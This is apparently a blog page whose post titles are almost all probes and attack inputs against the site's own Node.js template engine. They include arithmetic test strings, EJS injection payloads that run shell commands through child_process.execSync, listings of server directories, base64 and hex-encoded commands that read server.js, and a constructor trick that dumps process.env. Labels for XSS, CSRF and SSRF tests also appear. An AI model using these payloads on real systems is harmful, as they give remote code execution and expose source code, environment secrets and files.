Blogs
SSTI Test <%= 7*7 %> {{ 7*7 }} #{ 7*7 }
SSTI Content Test
SSTI_Content_v2
CSRF_Final
SSTI_Probe_1
XSS_Probe_1
<%= 7*7 %>
Attacker Post
XSS Test
SSTI Attempt
Click Me
<%= 7*7 %>
SSRF Test
<%= process.mainModule.require('child_process').execSync('id').toString() %>
<%= settings['view engine'] %>
<%= process.cwd() %>
<%= process.mainModule.require('fs').readdirSync('.').join(',') %>
Read File
<%= Object.getOwnPropertyNames(this).join(',') %>
<%= ''.sub.constructor('return process.env')() %>
<%= global.process ? 'process_exists' : 'no_process' %>
Replication <%= 8*8 %>
Definitive <%= 5*5 %>
Server Source
<%= process.mainModule.require('child_process').execSync('cat server.js | base64 -w 0').toString() %>
Listing:
<%= process.mainModule.require('fs').readdirSync('.').join(',') %>
<%= process.mainModule.require('fs').readdirSync('public').join(',') %>
File Listing
Exploit Hex
<%= process.mainModule.require('child_process').execSync(Buffer.from('68656164202d6e203230207365727665722e6a73', 'hex').toString()) %>
<%= process.mainModule.require('child_process').execSync('id').toString() %>
Sum: <%= 1+1 %>
Env: <%= ''.sub.constructor('return process.env')() %>
Definitive <%= 5*5 %>